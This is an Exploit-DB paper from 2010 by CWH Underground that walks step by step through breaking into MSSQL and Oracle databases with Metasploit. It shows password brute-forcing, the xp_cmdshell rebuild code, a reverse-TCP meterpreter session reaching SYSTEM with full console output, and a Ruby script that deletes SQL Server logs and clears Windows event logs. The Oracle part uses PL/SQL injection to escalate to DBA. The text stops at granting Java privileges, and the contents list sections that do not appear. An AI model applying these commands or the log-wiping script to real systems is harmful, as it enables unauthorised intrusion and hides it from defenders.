The Operation CloudBurst Attack

EDB-ID:

13621

CVE:

N/A




Platform:

Multiple

Date:

2010-02-18


		|=--------------------------------------------------------------------=|
		|=---------------=[ The Operation CloudBurst Attack ]=----------------=|
		|=--------------------------=[ 18 Feb 2010 ]=-------------------------=|
		|=----------------------=[  By CWH Underground  ]=--------------------=|
		|=--------------------------------------------------------------------=|
				

######
 Info
######

Title	: The Operation CouldBurst Attack
Author	: ZeQ3uL  (Prathan Phongthiproek)
Team    : CWH Underground [http://www.exploit-db.com/author/CWH Underground]
Website	: cwh.citec.us / www.citec.us
Date	: 2010-02-18


##########
 Contents
##########

  [0x00] - Introduction

  [0x01] - Get Root on MSSQL Database

	[0x01a] - Scanning & Enumeration
	[0x01b] - Gaining Access
	[0x01c] - Covering Track

  [0x02] - Get Root on Oracle Database
	
	[0x02a] - Scanning & Enumeration
	[0x02b] - Gaining Access
	[0x02c] - PL/SQL Injection - Elevate Priv

  [0x03] - Operation CloudBurst

  [0x04] - References

  [0x05] - Greetz To


#######################
 [0x00] - Introduction
#######################

	Hi all, in this paper, we will guide you about methods to hacking into Microsoft SQL, Oracle Database and latest Attack in Chapter "Operation CloudBurst". Moreover, 
we also show the ways to use the Best Exploitation tool, Metasploit Framework (Thank HD Moore and Rapid7) that powerful than day in the past with many exploit and auxiliary (We will see it ;D)

	We divide the paper into 6 sections from 0x00 to 0x05. However, only section 0x01 to 0x03 are technical issue. Section 0x01, we show the steps to hack into MSSQL Database. Section 0x02, we switch to talk about Oracle Database. The Last technical section lets you update latest exploitation way Step-By-Step using Metasploit Framework get access to system and compromise all domain networks  :-D 

	We recommend to read previous paper "The Art of Grey-Box Attack" that guide you about methods to hacking into Windows system, Linux system and Client-Side Attack.


#####################################
 [0x01] - Get Root on MSSQL Database
#####################################
	
		In this section, we talk about attacking MSSQL Database in network. We will start with scanning
	and enumeration MSSQL then we move to gain access system with SYSTEM Privilege in order to control the machine completely.


	++++++++++++++++++++++++++++++++++
	 [0x01a] - Scanning & Enumeration
	++++++++++++++++++++++++++++++++++
	
		First, start with scanning by using Metasploit Framework with MSSQL Modules.

	Auxiliary
	=========

	   Name                       Rank    Description
	   ----                       ----    -----------
	   admin/mssql/mssql_enum     normal  Microsoft SQL Server Configuration Enumerator
	   admin/mssql/mssql_exec     normal  Microsoft SQL Server xp_cmdshell Command Execution
	   admin/mssql/mssql_sql      normal  Microsoft SQL Server Generic Query
	   scanner/mssql/mssql_login  normal  MSSQL Login Utility
	   scanner/mssql/mssql_ping   normal  MSSQL Ping Utility

	
	Exploits
	========

	   Name                                         Rank       Description
	   ----                                         ----       -----------
	   windows/mssql/lyris_listmanager_weak_pass    excellent  Lyris ListManager MSDE Weak sa Password
	   windows/mssql/ms02_039_slammer               good       Microsoft SQL Server Resolution Overflow
	   windows/mssql/ms02_056_hello                 good       Microsoft SQL Server Hello Overflow
	   windows/mssql/ms09_004_sp_replwritetovarbin  good       Microsoft SQL Server sp_replwritetovarbin Memory Corruption
	   windows/mssql/mssql_payload                  excellent  Microsoft SQL Server Payload Execution


		The first example, We use mssql_loing to scan machine that used MSSQL database and try dictionary attack with our dict:

	[MSF Result]-----------------------------------------------------------------------------------
	
	msf > use scanner/mssql/mssql_login
	msf auxiliary(mssql_login) > show options

	Module options:
	
	   Name             Current Setting                                Required  Description
	   ----             ---------------                                --------  -----------
	   HEX2BINARY       /opt/metasploit3/msf3/data/exploits/mssql/h2b  no        The path to the hex2binary script on the disk
 	   MSSQL_PASS                                                      no        The password for the specified username
	   MSSQL_PASS_FILE                                                 no        A dictionary of passwords to perform a bruteforce attempt
	   MSSQL_USER       sa                                             no        The username to authenticate as
	   RHOSTS                                                          yes       The target address range or CIDR identifier
	   RPORT            1433                                           yes       The target port
	   THREADS          1                                              yes       The number of concurrent threads

	msf auxiliary(mssql_login) > set RHOSTS 192.168.163.0/24
	RHOSTS => 192.168.163.0/24
	msf auxiliary(mssql_login) > set MSSQL_PASS_FILE /pentest/passwords/wordlists/sqlpass.lst
	MSSQL_PASS_FILE => /pentest/passwords/wordlists/sqlpass.lst
	msf auxiliary(mssql_login) > run
	
	[*] 192.168.163.128:1433 successful logged in as 'sa' with password ''
	[*] Scanned 1 of 3 hosts (100% complete)
	[*] Auxiliary module execution completed


	[End Result]------------------------------------------------------------------------------------
	
		From result, we got successful logged with 'sa' with blank password from 192.168.163.128 (Many admin use 'password', 'p@ssw0rd' without quote). Next step, we use mssql_enum to enumerate MSSQL 	information from target.
	
	[MSF Result]-----------------------------------------------------------------------------------
	
	msf > use admin/mssql/mssql_enum
		msf auxiliary(mssql_enum) > show options

	Module options:

	   Name        Current Setting                                Required  Description
	   ----        ---------------                                --------  -----------
	   HEX2BINARY  /opt/metasploit3/msf3/data/exploits/mssql/h2b  no        The path to the hex2binary script on the disk
	   MSSQL_PASS                                                 no        The password for the specified username
	   MSSQL_USER  sa                                             no        The username to authenticate as
	   RHOST                                                      yes       The target address
	   RPORT       1433                                           yes       The target port

	msf auxiliary(mssql_enum) > set RHOST 192.168.163.128
	RHOST => 192.168.163.128
	msf auxiliary(mssql_enum) > run
	
	[*] Running MS SQL Server Enumeration...
	[*] Version:
	[*]     Microsoft SQL Server  2000 - 8.00.194 (Intel X86)
	[*]             Aug  6 2000 00:57:48
	[*]             Copyright (c) 1988-2000 Microsoft Corporation
	[*]             Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 1)
	[*] Configuration Parameters:
	[*]     C2 Audit Mode is Not Enabled
	[*]     xp_cmdshell is Enabled
	[*]     remote access is Enabled
	[*]     allow updates is Not Enabled
	[*]     Database Mail XPs is Enabled
	[*]     Ole Automation Procedures is Enabled
	[*] Databases on the server:
	[*]     Database name:master
	[*]     Database Files for master:
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\master.mdf
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\mastlog.ldf
	[*]     Database name:tempdb
	[*]     Database Files for tempdb:
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\tempdb.mdf
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\templog.ldf
	[*]     Database name:model
	[*]     Database Files for model:
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\model.mdf
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\modellog.ldf
	[*]     Database name:msdb
	[*]     Database Files for msdb:
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\msdbdata.mdf
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\msdblog.ldf
	[*]     Database name:pubs
	[*]     Database Files for pubs:
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\pubs.mdf
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\pubs_log.ldf
	[*]     Database name:Northwind
	[*]     Database Files for Northwind:
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\northwnd.mdf
	[*]             C:\Program Files\Microsoft SQL Server\MSSQL\data\northwnd.ldf
	[*] System Logins on this Server:
	[*]     sa
	[*]     BUILTIN\Administrators
	[*] System Admin Logins on this Server:
	[*]     BUILTIN\Administrators
	[*]     sa
	[*] Windows Logins on this Server:
	[*]     No Windows logins found!
	[*] Windows Groups that can logins on this Server:
	[*]     BUILTIN\Administrators
	[*] Accounts with Username and Password being the same:
	[*]     No Account with its password being the same as its username was found.
	[*] Accounts with empty password:
	[*]     sa
	[*] Stored Procedures with Public Execute Permission found:
	[*]     xp_getfiledetails
	[*]     xp_dirtree
	[*]     xp_fixeddrives
	[*]     xp_cmdshell
	[*]     xp_getnetname
	[*]     xp_enum_activescriptengines
	[*]     xp_fileexist
	[*]     xp_ntsec_enumdomains
	[*]     sp_getbindtoken
	[*]     sp_createorphan
	[*]     xp_unc_to_drive
	[*]     sp_droporphans
	[*]     xp_MSplatform
	[*]     sp_xml_preparedocument
	[*]     sp_xml_removedocument
	[*]     xp_IsNTAdmin
	[*]     xp_MSnt2000
	[*]     xp_grantlogin
	[*]     xp_revokelogin
	[*]     xp_MSLocalSystem
	[*]     sp_prepexec
	[*]     sp_prepexecrpc
	[*]     sp_unprepare
	[*]     sp_reset_connection
	[*]     sp_getschemalock
	[*]     sp_releaseschemalock
	[*]     sp_resyncprepare
	[*]     sp_resyncexecute
	[*]     sp_resyncexecutesql
	[*]     sp_resyncuniquetable
	[*]     sp_refreshview
	[*]     sp_repldone
	[*]     sp_repltrans
	[*]     sp_replcounters
	[*]     sp_replcmds
	[*]     sp_replpostschema
	[*]     sp_replincrementlsn
	[*]     sp_replsetoriginator
	[*]     sp_replsetsyncstatus
	[*]     xp_mergexpusage
	[*]     xp_showlineage
	[*]     xp_updatelineage
	[*]     xp_proxiedmetadata
	[*]     xp_initcolvs
	[*]     xp_updatecolvbm
	[*]     xp_showcolv
	[*]     xp_execresultset
	[*]     xp_varbintohexstr
	[*]     xp_intersectbitmaps
	[*]     xp_displayparamstmt
	[*]     xp_printstatements
	[*]     sp_replsendtoqueue
	[*]     sp_replwritetovarbin
	[*]     xp_qv
	[*]     xp_regread
	[*] Instances found on this server:
	[*]     MSSQLSERVER
	[*] Default Server Instance SQL Server Service is running under the privilege of:
	[*]     LocalSystem
	[*] Auxiliary module execution completed

	[End Result]------------------------------------------------------------------------------------
	


	++++++++++++++++++++++++++
	 [0x01b] - Gaining Access
	++++++++++++++++++++++++++


		Next step, We will get shell from target with MSSQL's stored procedure xp_cmdshell. It enabled by default on MSSQL2000 but in MSSQL2005,2008 it disabled by default so We can re-enable or create 	xp_cmdshell with these command (Metasploit 'admin/mssql/mssql_exec' can re-enable XP_CMDSHELL):
	
	Re-Enable XP_CMDSHELL on MSSQL 2005/2008 - "exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;"
	Re-Enable XP_CMDSHELL on MSSQL 2000	 - "exec sp_addextendedproc 'xp_cmdshell','xp_log70.dll';exec sp_addextendedproc 'xp_cmdshell', 'C:\\Program Files\\Microsoft SQL Server\\MSSQL\\Binn\								    \xplog70.dll';"
	Rebuild XP_CMDSHELL if it was deleted	 - "CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS;DECLARE @result int, @OLEResult int, @RunResult int;DECLARE @ShellID int;
						    EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT;IF @OLEResult <> 0 SELECT @result = @OLEResult;IF @OLEResult <> 0 RAISERROR 
						    ('CreateObject %0X', 14, 1, @OLEResult);EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait;IF @OLEResult <> 0 SELECT 
						    @result = @OLEResult;IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult);EXECUTE @OLEResult = sp_OADestroy @ShellID;return @result;"

		Now we use mssql_payload to spawn meterpreter shell that make me easy to compromise system

	[MSF Result]-----------------------------------------------------------------------------------
	
	msf > use windows/mssql/mssql_payload
	msf exploit(mssql_payload) > show options

	Module options:

	   Name      Current Setting  Required  Description
	   ----      ---------------  --------  -----------
	   PASSWORD                   no        The password for the specified username
	   RHOST                      yes       The target address
	   RPORT     1433             yes       The target port
	   USERNAME  sa               no        The username to authenticate as

	
	Exploit target:

	   Id  Name
	   --  ----
	   0   Automatic

	
	msf exploit(mssql_payload) > set RHOST 192.168.163.128
	RHOST => 192.168.163.128
	msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
	PAYLOAD => windows/meterpreter/reverse_tcp
	msf exploit(mssql_payload) > set LHOST 192.168.163.2
	LHOST => 192.168.163.2
	msf exploit(mssql_payload) > exploit
	[*] Started reverse handler on port 4444
	[*] Warning: This module will leave nPIsxDgn.exe in the SQL Server %TEMP% directory
	[*] Writing the debug.com loader to the disk...
	
	[*] Converting the debug script to an executable...
	[*] Uploading the payload, please be patient...
	[*] Converting the encoded payload...
	[*] Executing the payload...
	[*] Sending stage (725504 bytes)
	[*] Meterpreter session 1 opened (192.168.163.2:4444 -> 192.168.163.128:1050)

	meterpreter > getuid
	Server username: NT AUTHORITY\SYSTEM
	
	[End Result]------------------------------------------------------------------------------------
	
		

	++++++++++++++++++++++++++
	 [0x01c] - Covering Track
	++++++++++++++++++++++++++
	

		How about Log file ?? When we used meterpreter script to spawn shell, Windows Event viewer can keep our log activity. So I found nice script from Zero Cold@intern0t to clear our logs:

	Mssqlclear.rb

	[Code]-----------------------------------------------------------------------------------

	  #MSSQL LOG CLEAR BY ZERO COLD
  
  	  def list_exec(session,cmdlst)
  	  print_status("Running Command List ...")
  	  r=''
    	session.response_timeout=120
    	cmdlst.each do |cmd|
       	begin
      	   print_status "running command #{cmd}"
       	   r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
       	   while(d = r.channel.read)
	 
       	      print_status("#{d}")
       	   end
       	   r.channel.close
       	   r.close
       	rescue ::Exception => e
       	   print_error("Error Running Command #{cmd}: #{e.class} #{e}")
       			end
    		end
 	end
 
 	commands = ['Net STOP "SQL Server (SQLEXPRESS)" ',
  	  'del "%SystemDrive%\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\ERRORLOG.*"',
  	  'del "%SystemDrive%\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\log*.trc"',
  	  'Net START "SQL Server (SQLEXPRESS)"']
	def clrevtlgs(session)
 	   evtlogs = [
   	    'security',
    	    'system',
    	    'application',
     	    'directory service',
    	    'dns server',
       	    'file replication service'
    	]
   	 print_status("Clearing Event Logs, this will leave and event 517")
    	begin
     	   evtlogs.each do |evl|
      	      print_status("Clearing the #{evl} Event Log")
      	      log = session.sys.eventlog.open(evl)
      	      log.clear
      	  end
      	  print_status("All Event Logs have been cleared")
    	rescue ::Exception => e
    	    print_status("Error clearing Event Log: #{e.class} #{e}")
	
   		 end
	end

	list_exec(client,commands)
	clrevtlgs(client)

	[End Code]------------------------------------------------------------------------------------


	Now we got mssqlclear.rb then place code into your metasploit scripts directory 


	[Run Script]---------------------------------------------------------------------------------
		
	meterpreter > run mssqlclear
	[*] Running Command List ...
	[*] running command Net STOP "SQL Server (SQLEXPRESS)"
	[*] The SQL Server (SQLEXPRESS) service is stopping.
	[*] The SQL Server (SQLEXPRESS) service was stopped successfully.
	[*] running command del "%SystemDrive%\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\ERRORLOG.*"
	[*] running command del "%SystemDrive%\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\log*.trc"
	[*] running command Net START "SQL Server (SQLEXPRESS)"
	[*] The SQL Server (SQLEXPRESS) service is starting.
	[*] The SQL Server (SQLEXPRESS) service was started successfully.
	[*] Clearing Event Logs, this will leave and event 517
	[*] Clearing the security Event Log
	[*] Clearing the system Event Log
	[*] Clearing the application Event Log
	[*] Clearing the directory service Event Log
	[*] Clearing the dns server Event Log
	[*] Clearing the file replication service Event Log[*] All Event Logs have been cleared
	meterpreter >

	[End Run]------------------------------------------------------------------------------------
	


######################################
 [0x02] - Get Root on Oracle Database
######################################

	

	++++++++++++++++++++++++++++++++++
	 [0x02a] - Scanning & Enumeration
	++++++++++++++++++++++++++++++++++

		First, start with scanning by using Metasploit Framework with Oracle Modules.

	Auxiliary
	=========

	   Name                                        Rank    Description
 	   ----                                        ----    -----------
   	   admin/oracle/droptable_trigger              normal  SQL Injection in  MDSYS.SDO_TOPO_DROP_FTBL Trigger.
   	   admin/oracle/login_brute                    normal  Oracle Account Discovery.
	   admin/oracle/ora_ntlm_stealer               normal  Oracle SMB Relay Code Execution
	   admin/oracle/oracle_sql                     normal  Oracle SQL Generic Query
	   admin/oracle/oraenum                        normal  Oracle Database Enumeration
	   admin/oracle/osb_execqr                     normal  Oracle Secure Backup exec_qr() Command Injection Vulnerability
	   admin/oracle/osb_execqr2                    normal  Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability
	   admin/oracle/post_exploitation/win32exec    normal  Oracle Java execCommand (Win32)
	   admin/oracle/post_exploitation/win32upload  normal  Oracle URL Download
	   admin/oracle/sid_brute                      normal  ORACLE SID Brute Forcer.
	   admin/oracle/tnscmd                         normal  TNSLsnr Command Issuer
	   scanner/oracle/emc_sid                      normal  Oracle Enterprise Manager Control SID Discovery
	   scanner/oracle/sid_enum                     normal  SID Enumeration.
	   scanner/oracle/spy_sid                      normal  Oracle Application Server Spy Servlet SID Enumeration.
	   scanner/oracle/tnslsnr_version              normal  Oracle tnslsnr Service Version Query.
	   scanner/oracle/xdb_sid                      normal  Oracle XML DB SID Discovery
	   sqli/oracle/dbms_cdc_ipublish               normal  SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE
	   sqli/oracle/dbms_cdc_publish                normal  SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE
	   sqli/oracle/dbms_defer_sys                  normal  SQL Injection via SYS.DBMS_DEFER_SYS
	   sqli/oracle/dbms_export_extension	       normal  SQL Injection via DBMS_EXPORT_EXTENSION
	   sqli/oracle/dbms_metadata_get_granted_xml   normal  SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML.
	   sqli/oracle/dbms_metadata_get_xml           normal  SQL Injection via SYS.DBMS_METADATA.GET_XML.
	   sqli/oracle/dbms_metadata_open              normal  SQL Injection via SYS.DBMS_METADATA.OPEN.
	   sqli/oracle/lt_compressworkspace            normal  SQL Injection via SYS.LT.COMPRESSWORKSPACE.
	   sqli/oracle/lt_findricset_cursor            normal  SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method
	   sqli/oracle/lt_mergeworkspace               normal  SQL Injection via SYS.LT.MERGEWORKSPACE.
	   sqli/oracle/lt_removeworkspace              normal  SQL Injection via SYS.LT.REMOVEWORKSPACE.
	   sqli/oracle/lt_rollbackworkspace            normal  SQL Injection via SYS.LT.ROLLBACKWORKSPACE.


	Exploits
	========

	   Name                                       Rank    Description
	   ----                                       ----    -----------
	   windows/browser/oracle_dc_submittoexpress  normal  Oracle Document Capture 10g ActiveX Control Buffer Overflow
	   windows/ftp/oracle9i_xdb_ftp_pass          great   Oracle 9i XDB FTP PASS Overflow (win32)
	   windows/ftp/oracle9i_xdb_ftp_unlock        great   Oracle 9i XDB FTP UNLOCK Overflow (win32)
	   windows/http/oracle9i_xdb_pass             great   Oracle 9i XDB HTTP PASS Overflow (win32)
	   windows/oracle/osb_ndmp_auth               good    Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow
	   windows/oracle/tns_arguments               good    Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow.
	   windows/oracle/tns_service_name            good    Oracle TNS Listener SERVICE_NAME Buffer Overflow.



		Next, We must find machine that use Oracle DB (Default port=1521) with 'scanner/oracle/tnslsnr_version'.

	[MSF Result]----------------------------------------------------------------------------

	msf > use scanner/oracle/tnslsnr_version
	msf auxiliary(tnslsnr_version) > show options

	Module options:

  	   Name     Current Setting  Required  Description
	   ----     ---------------  --------  -----------
	   RHOSTS                    yes       The target address range or CIDR identifier
	   RPORT    1521             yes       The target port
	   THREADS  1                yes       The number of concurrent threads
	
	msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.163.0/24
	RHOSTS => 192.168.163.0/24
	msf auxiliary(tnslsnr_version) > run
	
	[*] Scanned 026 of 256 hosts (010% complete)
	[*] Scanned 052 of 256 hosts (020% complete)
	[*] Scanned 077 of 256 hosts (030% complete)
	[*] Scanned 103 of 256 hosts (040% complete)
	[*] Scanned 128 of 256 hosts (050% complete)
	[*] Host 192.168.163.140 is running: 32-bit Windows: Version 9.2.0.1.0 - Production
	[*] Scanned 154 of 256 hosts (060% complete)
	[*] Scanned 180 of 256 hosts (070% complete)
	[*] Scanned 205 of 256 hosts (080% complete)
	[*] Scanned 231 of 256 hosts (090% complete)
	[*] Scanned 256 of 256 hosts (100% complete)
	[*] Auxiliary module execution completed

	[End Result]----------------------------------------------------------------------------

		Next step, Find SID instance (Service Name) on 192.168.163.140. Oracle 9i can enumerate SID with TNS_listener (No password) or use tns_cmd to grab service to find SID.

	
	[MSF Result]----------------------------------------------------------------------------

	msf auxiliary(tnslsnr_version) > use scanner/oracle/sid_enum
	msf auxiliary(sid_enum) > show options
	
	Module options:

	   Name     Current Setting  Required  Description
	   ----     ---------------  --------  -----------
	   RHOSTS                    yes       The target address range or CIDR identifier
	   RPORT    1521             yes       The target port
	   THREADS  1                yes       The number of concurrent threads

	msf auxiliary(sid_enum) > set RHOSTS 192.168.163.140
	RHOSTS => 192.168.163.140
	msf auxiliary(sid_enum) > run
	
	[*] Identified SID for 192.168.163.140: RD
	[*] Identified SERVICE_NAME for 192.168.163.140: RD.ORA
	[*] Scanned 1 of 1 hosts (100% complete)
	[*] Auxiliary module execution completed
	msf auxiliary(sid_enum) >

	[End Result]----------------------------------------------------------------------------

		It's seem we lucky to found SERVICE_NAME=RD.ORA, If 'sid_enum' not work, You can use 'admin/oracle/sid_brute' to find SID. Next step, Make sure that SERVICE_NAME=RD.ORA with 
	'admin/oracle/tnscmd'
	
	[MSF Result]----------------------------------------------------------------------------

	msf auxiliary(sid_enum) > use admin/oracle/tnscmd
	msf auxiliary(tnscmd) > show options

	Module options:

	   Name   Current Setting                   Required  Description
	   ----   ---------------                   --------  -----------
	   CMD    (CONNECT_DATA=(COMMAND=VERSION))  no        Something like ping, version, status, etc..
	   RHOST                                    yes       The target address
	   RPORT  1521                              yes       The target port
	
	msf auxiliary(tnscmd) > set RHOST 192.168.163.140
	RHOST => 192.168.163.140
	msf auxiliary(tnscmd) > set CMD (CONNECT_DATA=(COMMAND=STATUS))
	CMD => (CONNECT_DATA=(COMMAND=STATUS))
	msf auxiliary(tnscmd) > run
	sending (CONNECT_DATA=(COMMAND=status)) to 192.168.163.140:1521
	writing 89 bytes
	reading
	. .......6.........S. ...........]........(DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0)(ALIAS=LISTENER)
	(SECURITY=OFF)(VERSION=TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production)(START_DATE=13-11TB-200809:50:24)(SIDNUM=1)(LOGFILE=e:\oracle\ora92\network\log\listener.log)
	(PRMFILE=e:\oracle\ora92\network\admin\listener.ora)(TRACING=off)(UPTIME=32233167)(SNMP=OFF)(PID=1580))
	.5........(ENDPOINT=(HANDLER=(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)(ESTABLISHED=0)(REFUSED=0)
	(HANDLER_ID=05ABD43D6CF4-438B-A1A1-14FC7801D431)(PRE=any)(SESSION=NS)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)
	(HOST=abc.com)(PORT=1521))))),,(ENDPOINT=(HANDLER=(STA=ready)(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)
	(ESTABLISHED=0)(REFUSED=0)(HANDLER_ID=A06894A90C64-4555-A915-FC8798AA2A9B)(PRE=http)(SESSION=RAW)
	(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=abc.com)(PORT=8080))(Presentation=HTTP)(Session=RAW)))),,
	(ENDPOINT=(HANDLER=(STA=ready)(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)(ESTABLISHED=0)(REFUSED=0)
	(HANDLER_ID=A0BB13DB2389-431A-80F2-D896C275A179)(PRE=FTP)(SESSION=RAW)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)
	(HOST=abc.com)(PORT=2100))(Presentation=FTP)(Session=RAW)))),,(SERVICE=(SERVICE_NAME=RD.ORA)
	(INSTANCE=(INSTANCE_NAME=RD)(NUM=2)(NUMREL=1))),,(SERVICE=(SERVICE_NAME=RD.ORA)
	(INSTANCE=(INSTANCE_NAME=RD)(NUM=2)(NUMREL=1))),,.........@

	[End Result]----------------------------------------------------------------------------



	++++++++++++++++++++++++++
	 [0x02b] - Gaining Access
	++++++++++++++++++++++++++

		Now We got real SID is RD.ORA, Next step use 'admin/oracle/login_brute' to brute-force weak username and password 
	such as SYSTEM/MANAGER, DBSNMP/DBSNMP, SCOTT/TIGER Then Connect to Oracle database and query command with 'admin/oracle/oracle_sql'
	For example we use SCOTT/TIGET that default username/password.

	
	[MSF Result]----------------------------------------------------------------------------

	msf auxiliary(tnscmd) > use admin/oracle/login_brute
	msf auxiliary(login_brute) > show options

	Module options:

	   Name     Current Setting                                                    Required  Description
	   ----     ---------------                                                    --------  -----------
	   CSVFILE  /opt/metasploit3/msf3/data/wordlists/oracle_default_passwords.csv  no        The file that contains a list of default accounts.
	   RHOST                                                                       yes       The Oracle host.
	   RPORT    1521                                                               yes       The TNS port.
	   SID      ORCL                                                               yes       The sid to authenticate with.
	
	msf auxiliary(login_brute) > set RHOST 192.168.163.140
	RHOST => 192.168.163.140
	msf auxiliary(login_brute) > set SID RD.ORA
	SID => RD.ORA
	msf auxiliary(login_brute) > run

	[*] Found user/pass of: DBSNMP/DBSNMP...
	[*] Found user/pass of: SCOTT/TIGER...
	[*] Auxiliary module execution completed

	msf auxiliary(login_brute) > use admin/oracle/oracle_sql
	msf auxiliary(oracle_sql) > show options
	
	Module options:

	   Name    Current Setting          Required  Description
	   ----    ---------------          --------  -----------
	   DBPASS  TIGER                    yes       The password to authenticate with.
	   DBUSER  SCOTT                    yes       The username to authenticate with.
	   RHOST                            yes       The Oracle host.
	   RPORT   1521                     yes       The TNS port.
	   SID     ORCL                     yes       The sid to authenticate with.
	   SQL     select * from v$version  no        The SQL to execute.

	msf auxiliary(oracle_sql) > set RHOST 192.168.163.140
	RHOST => 192.168.163.140
	msf auxiliary(oracle_sql) > set SID RD.ORA
	SID => RD.ORA
	msf auxiliary(oracle_sql) > run
	
	[*] Sending SQL...
	[*] Oracle9i Enterprise Edition Release 9.2.0.1.0 - Production
	[*] PL/SQL Release 9.2.0.1.0 - Production
	[*] CORE 9.2.0.1.0 Production
	[*] TNS for 32-bit Windows: Version 9.2.0.1.0 - Production
	[*] NLSRTL Version 9.2.0.1.0 - Production
	[*] Done...
	[*] Auxiliary module execution completed
	msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs"
	SQL => select * from user_role_privs
	msf auxiliary(oracle_sql) > run

	[*] Sending SQL...
	[*] SCOTT,CONNECT,NO,YES,NO
	[*] SCOTT,RESOURCE,NO,YES,NO
	[*] Done...
	[*] Auxiliary module execution completed


	[End Result]----------------------------------------------------------------------------



	+++++++++++++++++++++++++++++++++++++++++++
	 [0x02c] - PL/SQL Injection - Elevate Priv
	+++++++++++++++++++++++++++++++++++++++++++

		
		We can query with SCOTT Priv but we want more priv like god (root). With PL/SQL Injection, we can potentially elevate their level of priv from a low-level PUBLIC account to an account with 
	DBA-level priv. In Metasploit have module for SQLi Oracle:

	Auxiliary
	=========

	   Name                                        Rank    Description
 	   ----                                        ----    -----------
   	   sqli/oracle/dbms_cdc_ipublish               normal  SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE
	   sqli/oracle/dbms_cdc_publish                normal  SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE
	   sqli/oracle/dbms_defer_sys                  normal  SQL Injection via SYS.DBMS_DEFER_SYS
	   sqli/oracle/dbms_metadata_get_granted_xml   normal  SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML.
	   sqli/oracle/dbms_metadata_get_xml           normal  SQL Injection via SYS.DBMS_METADATA.GET_XML.
	   sqli/oracle/dbms_metadata_open              normal  SQL Injection via SYS.DBMS_METADATA.OPEN.
	   sqli/oracle/dbms_export_extension	       normal  SQL Injection via DBMS_EXPORT_EXTENSION
	   sqli/oracle/lt_compressworkspace            normal  SQL Injection via SYS.LT.COMPRESSWORKSPACE.
	   sqli/oracle/lt_findricset_cursor            normal  SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method
	   sqli/oracle/lt_mergeworkspace               normal  SQL Injection via SYS.LT.MERGEWORKSPACE.
	   sqli/oracle/lt_removeworkspace              normal  SQL Injection via SYS.LT.REMOVEWORKSPACE.
	   sqli/oracle/lt_rollbackworkspace            normal  SQL Injection via SYS.LT.ROLLBACKWORKSPACE.

		 
		It's time to elevate SCOTT priv to DBA priv with SQLi DBMS_EXPORT_EXTENSION
	
	[MSF Result]----------------------------------------------------------------------------

	msf > use sqli/oracle/dbms_export_extension
	msf auxiliary(dbms_export_extension) > set RHOST 192.168.163.140
	RHOST => 192.168.163.140
	msf auxiliary(dbms_export_extension) > set SID RD.ORA
	SID => RD.ORA
	msf auxiliary(dbms_export_extension) > run

	[*] Sending package...
	[*] Done...
	[*] Sending body...
	[*] Done...
	[*] Sending declare...
	[*] Done...
	[*] Auxiliary module execution completed

	msf auxiliary(dbms_export_extension) > use admin/oracle/oracle_sql
	msf auxiliary(oracle_sql) > set RHOST 192.168.163.140
	RHOST => 192.168.163.140
	msf auxiliary(oracle_sql) > set SID RD.ORA
	SID => RD.ORA
	msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs"
	SQL => select * from user_role_privs
	msf auxiliary(oracle_sql) > run

	[*] Sending SQL...
	[*] SCOTT,CONNECT,NO,YES,NO
	[*] SCOTT,DBA,NO,YES,NO
	[*] SCOTT,RESOURCE,NO,YES,NO
	[*] Done...
	[*] Auxiliary module execution completed

	[End Result]----------------------------------------------------------------------------
	
		W00T W00T !!, Now SCOTT has DBA Priv. Happy Time to Spawn shell with Java but first we must grant javasys priv to SCOTT.

	[MSF Result]----------------------------------------------------------------------------

	msf auxiliary(oracle_sql) > set SQL "grant javasyspriv to SCOTT"
	SQL => grant javasyspriv to SCOTT
	msf auxiliary(oracle_sql) > run
	
	[*] Sending SQL...
	[*] Done...
	[*] Auxiliary module execution completed
	
